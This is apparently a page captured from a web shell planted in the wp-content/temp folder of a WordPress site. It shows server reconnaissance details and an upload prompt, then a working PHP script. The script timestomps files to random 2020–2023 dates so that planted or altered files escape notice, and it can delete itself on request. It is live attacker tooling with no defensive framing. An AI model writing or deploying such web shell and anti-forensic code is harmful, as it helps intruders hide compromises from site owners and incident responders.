| Server IP : 141.193.213.10 / Your IP : 216.73.217.15 Web Server : nginx System : Linux pod-403345 6.8.0-1055-gke #61-Ubuntu SMP Tue May 26 22:57:42 UTC 2026 x86_64 User : fpm200158 ( 200158) PHP Version : 8.4.23 Disable Function : apache_child_terminate,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,disk_free_space,disk_total_space,diskfreespace,dl,exec,fastcgi_finish_request,link,opcache_compile_file,opcache_get_configuration,opcache_invalidate,opcache_is_script_cached,opcache_reset,passthru,pclose,pcntl_exec,popen,posix_getpid,posix_getppid,posix_getpwuid,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_uname,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,realpath_cache_get,shell_exec,show_source,symlink,system MySQL : OFF | cURL : ON | WGET : OFF | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nas/content/live/mycarpair/wp-content/temp/ |
Upload File : |
<?php
header('Content-Type: application/json; charset=utf-8');
if (isset($_GET['delete_self'])) {
$file = __FILE__;
if (@unlink($file)) {
echo '<p> 文件删除成功 </p>';
} else {
echo '<p> 手动删除失败,请检查权限 </p>';
}
exit;
}
if (!isset($_POST['path']) || empty($_POST['path'])) {
echo json_encode(['success' => false]);
exit;
}
$path = json_decode($_POST['path'], true);
foreach ($path as $value) {
$value = $_SERVER["DOCUMENT_ROOT"] . '/' .ltrim($value, '/');
if(file_exists($value)){
$start = strtotime('2020-01-01 00:00:00');
$end = strtotime( '2023-12-31 23:59:59');
$randomTimestamp = mt_rand($start, $end);
@touch($value, $randomTimestamp);
}
}
echo json_encode(['success' => true]);